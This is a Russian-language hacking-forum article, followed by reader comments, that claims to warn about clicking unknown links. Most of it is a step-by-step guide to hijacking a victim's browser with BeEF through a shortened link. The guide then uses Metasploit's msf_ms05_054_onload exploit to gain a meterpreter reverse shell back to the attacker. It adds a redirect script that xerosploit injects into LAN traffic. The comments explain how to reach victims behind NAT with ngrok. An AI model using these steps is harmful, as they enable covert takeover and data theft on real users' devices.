• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Опасность перехода по неизвестным URL. Взлом устройств.

Статья для участия в конкурсе на codeby.

Приветствую друзья! Сегодня мы поговорим о всей опасности перехода по URL от неизвестных лиц. Также будет много практики. Надеюсь вам будет интересно. Приступим!

Введение.

Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?
Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности...

  • Первое что может случится при переходе по ссылке это то, что злоумышленник получет доступ к вашим аккаунтам социальных сетей.
Данный метод мы затрагивать не будем. Он был описан мной в цикле статей - Получение доступа к аккаунтам социальных сетей.
  • Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
  • Подгрузить малварь используя exploit pack.
На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики)

Подгружаем малварь.

Exploit pack - это своеобразная связка эксплойтов.

К прибольшому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit. Этот способ я придумал совсем недавно.

Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit - фреймворк для поиска и эксплоутации уязвимостей. То есть для проветения тестирования на проникновение.

Запуск beef.

В терминале пишем
Код:
beef-xss
Переходим по ссылке ниже
Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.
Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js
Нужно подгрузить его ей.
http://<ваш ip>:3000/demos/basic.html
Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.
Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:
  1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
  2. Ищем там раздел extension. У metasploit меняем значение параметра на true
Screenshot_from_2017-35.png
  1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
  2. Запускаем metasploit и пишем следующее
Код:
msf> load msgrpc
Screenshot_from_2017-11-07_11-32-20.png

И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.
Переходим в /usr/share/beef-xss/ и пишем
Код:
./beef -x
После этого в beef загрузятся exploit'ы.
Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.

Screenshot_from_2017-11-07_12-03-22.png
И как видно на скриншоте - это windows.
Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Screenshot_from_2017-11-07_11-49-29.png
Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp
Заполняем все поля.
Теперь открываем msf и пишем
Код:
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <your_ip>
4. exploit

Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)
А пользователь всего-то перешел по ссылке.

А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:
HTML:
<script>
document.location.href="http://<your ip>:3000/demos/basic.html";
</script>

Запускаем xerosploit. И выбираем:
Код:
scan --> ip жертвы --> injectjs --> run --> путь до hack.js
Далее проделываем выше описанное.Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны друзья)

Вывод

Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? Последствия просто ужасны. Надеюсь вам понравилась данная статья!
 
Последнее редактирование:

CyberX88

Green Team
05.02.2017
122
43
BIT
0
Есть вопрос,скажи пожалуйста с телефонм такая штука прокатит?
 

CyberX88

Green Team
05.02.2017
122
43
BIT
0
Столкнулся с такой проблемой,сделал как указно выше,но пейлод найти в списке не могу,как исправить?
 

Mustalaiva

Green Team
03.04.2017
19
22
BIT
0
Я так понимаю, рекомендуется проверять ссылки от неизвестных на virustotal, dr.web итд?)
 

newbiee

Green Team
28.06.2017
50
70
BIT
0
Прекрасная статья, я бы отдал победу этой статье!
Уважаемый, ТС, xerosploit же работает только в LAN, не могу понять, как это реализуется то с публичным IPшником? Или получается роутер сначала надо проэксплуатировать? Расскажите, пожалуйста, подробнее. Очень интересная статья. Однозначно лучшая!!!
 
S

serjAk

Прекрасная статья, я бы отдал победу этой статье!
Уважаемый, ТС, xerosploit же работает только в LAN, не могу понять, как это реализуется то с публичным IPшником? Или получается роутер сначала надо проэксплуатировать? Расскажите, пожалуйста, подробнее. Очень интересная статья. Однозначно лучшая!!!
Попробуй пробросить порт для полезной нагрузки. Т.е порт должен слушаться за NATом. Если по каким то причинам вам этого не удается сделать, попробуйте использовать для тестирования бесплатный сервис VPN.
[doublepost=1510244720,1510244512][/doublepost]Интересная статья, но есть вопрос. Полезная нагрузка сохраняется пока пользователь находится на сайте?
 

newbiee

Green Team
28.06.2017
50
70
BIT
0
Попробуй пробросить порт для полезной нагрузки. Т.е порт должен слушаться за NATом. Если по каким то причинам вам этого не удается сделать, попробуйте использовать для тестирования бесплатный сервис VPN.
[doublepost=1510244720,1510244512][/doublepost]Интересная статья, но есть вопрос. Полезная нагрузка сохраняется пока пользователь находится на сайте?
Да, спасибо, я уже собственно нашёл информацию по этому поводу, собственно проброс делается с помощью ngrok. Но я всё равно думаю оплатить годовое членство на этом форуме, так как это лучший ресурс на данную тематику, который я видел в рунете.
Почему тут не постит Лука Сафонов?)

По поводу твоего вопроса: "Да, конечно, браузер пропадёт из вкладки, как только пользователь закроет сайт"
 
S

serjAk

Ну я думаю купить на месяц, интересно почитать. А вообще меня интересуют уязвимости ssh, а именно, почему данный протокол шифрует трафик, но есть способы перехвата логина и пароля mitm атакой. От этого спасает аутентификация по ключу.
 
S

serjAk

Статья аля как запугать мамку юзать инет
Ты не совсем прав. Не все такие умные как ты. Я как то проходил практику в одном предприятии, где много персоналки. Одной из задач поставленных мне, было устроить атаку на почтовые адреса сотрудников, по их домену. Мне нужно было найти адреса, которые они выложили на разных форумах "домохозяек". Мне удалось найти около 50 адресов. Я скинул им спам рассылку от доверенного адреса. Из всех адресов GET запрос был от 5 ipшников, один из них с отдела "работа с персоналом".
 

SlipX

dd if=/dev/random of=/dev/port
Green Team
13.08.2017
135
167
BIT
0
это как бы то и да, но всеже, прежде чем чтото делать нужно думать
 
S

serjAk

это как бы то и да, но всеже, прежде чем чтото делать нужно думать
Дак о чем речь. Есть крутые коммерческие организации старой закалки, где до сир пор стоит xp. Вроде как деньги зарабатывают, вроде как SNORT используют, а влететь на деньги могут.
 

vag4b0nd

Green Team
24.05.2017
303
1 472
BIT
30
Полезная нагрузка сохраняется пока пользователь находится на сайте?
Скрипт hook.js работает когда вкладка с нашим локальным сайтом открыта => он выполняет пайлоад и он уже поидее не должен зависеть от работы скрипта hook. т.е. если я не ошибаюсь "жертва" может сайт закрыть)))
[doublepost=1510258726,1510258524][/doublepost]
изменять на свой внутренний ip? или на какой, не совсем понятно
Если у тебя (как и у всех) там указан 127.0.0.1 ,т.е. локал хост, то впринцыпе можно не менять. А так да, локальное имя хоста (^_^)
 
  • Нравится
Реакции: SuPeRtEhNiC

newbiee

Green Team
28.06.2017
50
70
BIT
0
Скрипт hook.js работает когда вкладка с нашим локальным сайтом открыта => он выполняет пайлоад и он уже поидее не должен зависеть от работы скрипта hook. т.е. если я не ошибаюсь "жертва" может сайт закрыть)))
Хотелось бы на этот счёт услышать технический разбор от компетентных людей, вроде Ондрика и Даркнод, кого то из Red Team или Grey Team :)
Потому что мнение наших забугорных коллег обратное на этот счёт!
 

Citizen0

Green Team
07.02.2017
203
228
BIT
0
Хотелось бы на этот счёт услышать технический разбор от компетентных людей, вроде Ондрика и Даркнод, кого то из Red Team или Grey Team :)
Потому что мнение наших забугорных коллег обратное на этот счёт!
Вы - теоретик?
Если есть 2 разных мнения по этому поводу, то стоит поверить проверить самостоятельно. Возможно, у Вас появится 3 вариант. Еще лучше, если в ходе "экспериментов" накопится опыт для написания статей на форуме.
 

vag4b0nd

Green Team
24.05.2017
303
1 472
BIT
30
Хотелось бы на этот счёт услышать технический разбор от компетентных людей, вроде Ондрика и Даркнод, кого то из Red Team или Grey Team :)
Потому что мнение наших забугорных коллег обратное на этот счёт!
Я сегодня специально для тебя повторю все действия с бифом которые проводил во время написания статьи и отпишу тебе лично результат)))
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!